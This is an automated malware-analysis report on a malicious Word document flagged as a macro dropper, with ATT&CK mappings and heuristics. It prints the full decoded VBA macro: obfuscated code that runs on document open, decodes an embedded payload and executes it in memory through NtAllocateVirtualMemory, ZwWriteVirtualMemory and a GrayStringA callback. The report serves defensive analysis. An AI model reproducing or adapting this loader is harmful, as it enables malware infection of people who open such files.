Verdict: MALICIOUS
Risk Score: 90

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The critical ClamAV heuristic identifies it as a dropper, and the presence of a Document_Open macro suggests it executes automatically upon opening. The VBA code, while obfuscated, is indicative of a downloader or dropper, likely intended to fetch and execute a second-stage payload. The technique T1059.005 (Visual Basic) is identified due to the VBA macro, and T1566.001 (Spearphishing Attachment) is inferred as the likely initial access vector for such a document.
Heuristics (4)

- ClamAV: Doc.Dropper.ZwMacros-6057750-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `End Function Private Sub Document_Open() Dim ecumenical As Variant`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14225 bytes | 81444bd8bef86770311db823bd16c32f400a1c4c0a1deec5067238932ddbf2a8 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cricetus(cimetidine)
Dim descension As Variant
Dim calloused As String
Dim versifier As Integer
Dim equipotent As Variant
#If Win64 > 0 Then
Dim isochrone As Variant
Dim puff As LongPtr
sinistrally = 8 + 0
Dim libido As LongPtr
Dim pike As Long
Dim reflective As Long
Dim mandible As LongPtr
Dim coordination As Long
#Else
Dim backside As Byte
Dim puff As Long
sinistrally = 73 + 47 - 108 - 8
Dim libido As Long
Dim veneto As Integer
Dim mandible As Long
Dim disenthrallment As String
Dim tablinum As Long
#End If
pawnee = VarPtr(puff)
claustrophobic = agis(pawnee, VarPtr(cimetidine) + 8, sinistrally)
feel = 107 - 108
libido = 0
hereditary = 63 - 100 + 37
mandible = 9735
cuisse = 4096
obtrusively = 12 - 52 + 104
lawabiding = tuft(ByVal feel, libido, ByVal hereditary, mandible, ByVal cuisse, ByVal obtrusively)
oiled = "aphyllanthes"
collocation = Fix(302)
agis libido, puff, 4384
chelonian = 83
bubalus = 29634
calorie = 370889
Field = NPer(76 / 626, chelonian, -21428, calorie, 0)
cricetus = libido
End Function
Private Sub Document_Open()
Dim ecumenical As Variant
Dim irresolution As Byte
bola = "sudatory"
avatar = "jio"
theocracy
cheapen = 4
calcification = 394
obligatorily = 52583
fuimus = 104318
fuimus = Financial.SYD(fuimus, obligatorily, calcification, cheapen)
End Sub
Sub theocracy()
Dim inuendo As Variant
Dim mortise As Long
screed = ThisDocument.GetLetterContent().SenderGender
intrapulmonary.hotbed.Value = screed + 9
model = "uncompensated"
eve = "tesselated"
Set joint = intrapulmonary.hotbed.SelectedItem
paraprofessional = 5
barcelona = 135
hotei = 14959
gun = 559183
gun = Financial.SYD(gun, hotei, barcelona, paraprofessional)
accordionist = joint.Name
archipelago = 124 + 114 + 5606
seems = Right(accordionist, archipelago)
tendentious = deat.blasphemer(seems)
logometer = 5
audiology = 4719
barbarian = 574549
neurosarcoma = NPer(72 / 559, logometer, -6909, barbarian, 1)
again = "trull"
#If Win64 Then
Dim augustus As Integer
Dim titian As LongPtr
Dim boned As LongPtr
Dim naturae As Byte
#Else
Dim affably As Variant
Dim boned As Long
Dim mitra As Long
Dim titian As Long
#End If
functionalist = 38 - 96 + 68 - 10
aphyllophorales = "succors"
autocracy = "fac" & "ilita" & "tor"
condottiere = 4096
bucharest = 96
vivifying = 19332
chemosurgery = 106866
seamstress = NPer(84 / 764, bucharest, -22176, chemosurgery, 0)
controvertist = "elzevir"
hypsiglena = "gumwood"
aerosolized = "illluck"
charlatanism = "fluo" & "silica" & "te"
loosen = 118
despite = 31784
coulee = 414499
pinguecula = NPer(55 / 361, loosen, -27847, coulee, 0)
suppositious = tendentious
reflective = "ag" & "grie" & "ve"
caesural = "caprine"
titian = cricetus(suppositious)
banderilla = "catkinate"
asio = "catcall"
#If Win64 Then
Dim micrurus As Byte
Dim overreligious As LongPtr
commonly = "thriftlessness"
armstrong = "chelation"
Dim chub As LongPtr
bolus = 70 - 114 + 73 + 1283
#Else
bikini = "thaumaturgist"
cleromancy = "en" & "terolobium"
Dim overreligious As Long
demosthenic = 94 + 401
Dim chub As Long
bolus = demosthenic + 2659
#End If
Dim aldose As Integer
Dim anthriscus As Byte
overreligious = 0
boned = titian + bolus
chub = 1
nonsense = cryogenic(chub, chub, boned, overreligious, chub, overreligious, overreligious, overreligious, overreligious)
studia = 11
montane = 13165
outwardmoving = 117822
caterer = NPer(68 / 683, studia, -19242, outwardmoving, 0)
End Sub
Sub GenerateGlossary()
Dim strSource As String
Dim strDestination As String
Dim strGlossaryName As String
strSource = ActiveWindow.Caption
strGlossaryName = "word"
Documents.Add
ActiveDocument.SaveAs FileName:=strGlossaryName, FileFormat:=wdFormatDocument
strDestination = ActiveWindow.Caption
Windows(strSource).Activate
End Sub
Function agis(armistice, mentira, hystricidae)
#If Win64 Then
Dim trickster As Variant
Dim benzine As Integer
Dim bibliomaniacal As LongPtr
Dim autogamy As LongPtr
Dim bagatelle As LongPtr
Dim mascot As Long
Dim momus As LongPtr
Dim autacoid As LongPtr
#Else
Dim autogamy As Long
Dim sat As Variant
Dim bibliomaniacal As Long
Dim coriaceous As Integer
Dim momus As Long
Dim ghostwriter As Variant
Dim bagatelle As Long
Dim katsuwonidae As Long
Dim autacoid As Long
Dim convexity As String
Dim margravine As String
#End If
bryozoa = bryozoa
canzonet = collocation / 173
autogamy = armistice
autacoid = hystricidae
bryozoa = "whensoever"
momus = mentira
barn = 115
astrolabe = 6403
cubit = 359399
impressionism = NPer(70 / 393, barn, -12759, cubit, 0)
ninespot = Rnd(332)
bibliomaniacal = 14 - 1 - 14
dissolved ByVal bibliomaniacal, autogamy, momus, autacoid, bagatelle
bryozoa = "stewing"
End Function
Attribute VB_Name = "deat"
' Awesome, well let's go, awesome
' Saying I should lay down green on a ring like lantern
#If Win64 Then
' I think that I kill em, play possum
' Shawty you fine and your body is awesome
Public Declare PtrSafe Function tuft Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (curvature As LongPtr, parcels As LongPtr, ByVal vole As LongPtr,goodfornothingByVal As LongPtr, metic As LongPtr, ByVal nella As LongPtr) As LongPtr
' How rude, Stephanie Tanner
' Sold out shows, girls trying to get a glitz
Public Declare PtrSafe Function dispiritedly Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (glucoside As LongPtr, damaging As Any,enchantment As LongPtr, helenium As Any) As Boolean
' Wayne's World excellent
' I'm awesome every time I lay it down
Public Declare PtrSafe Function bully Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal adulterant As LongPtr,closeted As LongPtr,mauder As LongPtr,transfigure As LongPtr,catatonic As LongPtr) As Boolean
' Wayne's World excellent
' I'm awesome every time I lay it down
Public Declare PtrSafe Function drawstring Lib "Shell32.dll" Alias "SHGetDesktopFolder" (combustion As LongPtr)
' Wayne's World excellent
' I'm awesome every time I lay it down
Public Declare PtrSafe Function cryogenic Lib "User32" Alias "GrayStringA" ( ByVal unadvisable As Any, ByVal grandmother As Any, ByVal bacteroides As Any, ByVal chateura As Any, ByVal cognominal As Any, ByVal bicycle As Any, ByVal motor As Any, ByVal fates As Any, ByVal aeolian As Any) As Long
' Wayne's World excellent
' I'm awesome every time I lay it down
Public Declare PtrSafe Function antlered Lib "Shlwapi.dll" Alias "PathFileExists" (cruel As LongPtr) As LongPtr
' Wayne's World excellent
' I'm awesome every time I lay it down
Public Declare PtrSafe Function dissolved Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal tutelage As Any, ByVal notturnoitalian As Any, ByVal lope As Any, ByVal vitiated As Any, ByVal cosmetologist As Any) As LongPtr
' Wayne's World excellent
' I'm awesome every time I lay it down
Public Declare PtrSafe Function grandiose Lib "Shell32.dll" Alias "SHGetSetFolderCustomSettingsW" (halfcock As LongPtr,bereaved As LongPtr,apprentice As LongPtr) As LongPtr
' That's a side smiley face cause I'mma make the best of it
' Two thumbs up, you gon point 'em at this guy
' Wanna roll
' See even G couldn't F with it
#Else
' Party on Garth, shwing
' Gator on my shirt, what did it Lacoste him
Public Declare Function eyecup Lib "Shell32.dll" Alias "SHGetDesktopFolder" (predecessor As Long)
' Good Will Hunting, got up out of the hood
' Wanna roll
Public Declare Function dissolved Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal balking As Any, ByVal bullseye As Any, ByVal arquebusade As Any, ByVal thereabouts As Any, ByVal catarrh As Any) As Long
' Good Will Hunting, got up out of the hood
' Party on Garth, shwing
Public Declare Function actually Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal mauvais As Long, annwfn As Long, cadet As Long, lemaireocereus As Long, offices As Long) As Boolean
' Hands in the sky like
' Two thumbs up, you gon point em at this guy
Public Declare Function apart Lib "Shlwapi.dll" Alias "PathFileExists" (captor As Long) As Long
' Party on Garth, shwing
' How you feel
Public Declare Function paces Lib "Shell32.dll" Alias "SHGetSetFolderCustomSettingsW" (flatfoot As Long, big As Long, carissa As Long) As Long
' Two thumbs up, you gon point 'em at this guy
' Now tell me what got two thumbs and knows how to spit rhymes
Public Declare Function cryogenic Lib "User32" Alias "GrayStringA" (ByVal encyclopedical As Any, ByVal ennoble As Any, ByVal abolitionize As Any, ByVal rudimental As Any, ByVal nebulosity As Any, ByVal empathic As Any, ByVal primrose As Any, ByVal cinderwench As Any, ByVal misjoining As Any) As Long
' Trying to escape like Cuba Gooding with the flow
' Cooler than a peppermint
Public Declare Function tuft Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (kf As Long, blanch As Long, ByVal acorn As Long, allopathicByVal As Long, applicable As Long, ByVal headmaster As Long) As Long
' Sold out shows, girls trying to get a glitz
' Work ethic harder than a Mexican
Public Declare Function careerism Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (lifelike As Long, sind As Any, admit As Long, novelization As Any) As Boolean
' Awesome, well let's go, awesome
' Shawty you fine and your body is awesome
' Now tell me what got two thumbs and knows how to spit rhymes
' Gator on my shirt, what did it Lacoste him
#End If
' Now tell me what got two thumbs and knows how to spit rhymes
' Gator on my shirt, what did it Lacoste him
Function watermeal(terminated)
watermeal = AscW(terminated)
End Function
Function blasphemer(eosinophilia) As String
Dim acritical(6965) As Byte
Dim matronymic As Long
Dim delirium() As Byte
Dim diplopterygium As Long
Dim telum As String
Dim dissipated As Long
Dim lactuca As Long
collocation = Rnd(184)
Dim younker As Long
Dim flowerbed As Long
Dim anapsida(63) As Long
Dim accedas(63) As Long
bryozoa = "confluence"
Dim grody(63) As Long
Dim bailey As Integer
Dim chromolithograph As Integer
ninespot = Fix(184)
Dim guiana As Long
enablement = 8 + 8 + 65520
eagleeyed = 37 - 122 + 65365
Dim baisakh As Byte
Dim bonnebouche As Integer
golfing = 262144
ornithology = 94 + 118 - 54 - 94
enviousness = 255
Dim bumptiousness As String
burbot = 16515072
concupiscent = 4096
asarum = 4032
razorbill = 258048
gunwale = 16711680
acholia = 53 - 57 + 67
afoul = 65 + 14 + 10 + 167
Dim felt As Variant
apodeictical = 111 - 111
hopelessly = 4 + 5839
Dim bloodied() As Byte
Dim blepharitis As String
bloodied = VBA.Strings.StrConv(eosinophilia, vbFromUnicode)
Dim alphabetical As String
cyclicity = 8
barrenness = 178
prescript = 22663
espy = 463770
espy = Financial.SYD(espy, prescript, barrenness, cyclicity)
acoustic = 5843
camerated = 2 + Sqr(RGB(0, 1, 0))
For perisher = 0 To acoustic
If perisher Mod 2 = 0 Then
bloodied(perisher) = bloodied(perisher) + camerated
Else
bloodied(perisher) = bloodied(perisher) + camerated - 1
End If
Next perisher
notoriously = 56
valencia = 34775
permanently = 517542
aliene = NPer(84 / 426, notoriously, -20050, permanently, 0)
chromolithograph = 0
descendants = 8 + 17 - 25
canella = 46 - 72 - 99 + 168
abderite = caries
For flowerbed = 0 To 63
anapsida(flowerbed) = breakdown(flowerbed, ornithology, 45)
grody(flowerbed) = breakdown(flowerbed, concupiscent, 45)
accedas(flowerbed) = breakdown(flowerbed, golfing, 45)
Next flowerbed
ahead = 2
mycophagist = 391
acidforming = 16263
pontiff = 419702
pontiff = Financial.SYD(pontiff, acidforming, mycophagist, ahead)
delirium = bloodied
emmanthe = 51 - 47
car = 6
telegraphic = 177
freshwater = 13512
attemper = 401819
attemper = Financial.SYD(attemper, freshwater, telegraphic, car)
agrimonia = 38 + 107 - 142
ninespot = Fix(476)
mischievous = "powderpuff"
perpetua = agrimonia + 1
babyfaced = 2
For lactuca = 0 To acoustic
cosmetologist = delirium(lactuca)
church = delirium(lactuca + 2)
guiana = accedas(abderite(cosmetologist)) _
+ grody(abderite(delirium(lactuca + 1))) + anapsida(abderite(church)) + abderite(delirium(lactuca + agrimonia))
flowerbed = breakdown(guiana, gunwale, 37)
acritical(dissipated) = breakdown(flowerbed, enablement, 27)
flowerbed = breakdown(guiana, eagleeyed, 37)
acritical(dissipated + 1) = breakdown(flowerbed, afoul, 27)
acritical(dissipated + babyfaced) = breakdown(guiana, enviousness, 37)
dissipated = dissipated + babyfaced + 1
lactuca = lactuca + 3
Next
blasphemer = acritical
End Function
Function caries()
Dim araba(255) As Byte
rhamphoid = 35 - 97 + 127
Do
araba(rhamphoid) = rhamphoid - 65
rhamphoid = rhamphoid + 1
Loop Until rhamphoid = 91
rhamphoid = 48
Do
araba(rhamphoid) = rhamphoid + 4
rhamphoid = rhamphoid + 1
Loop Until rhamphoid = 58
rhamphoid = 97
Do
araba(rhamphoid) = rhamphoid - 71
rhamphoid = rhamphoid + 1
Loop Until rhamphoid = 123
araba(47) = 63
rhamphoid = 43
araba(rhamphoid) = 62
caries = araba
End Function
Sub tableSel()
Dim tempTable
Documents("Log.doc").Tables(1).Select
Set tempTable = Selection.Tables(1).Range
tempRange.Tables(2).Select
End Sub
Function breakdown(superincumbent, condolence, clivers)
Select Case clivers
Case 27
breakdown = superincumbent \ condolence
Case 37
breakdown = superincumbent And condolence
Case 45
breakdown = superincumbent * condolence
End Select
End Function
Attribute VB_Name = "intrapulmonary"
Attribute VB_Base = "0{7BC559A3-6874-4202-A224-40C1F107B0DE}{9C6B395E-A082-4F20-A3CB-1F49D77A17C1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False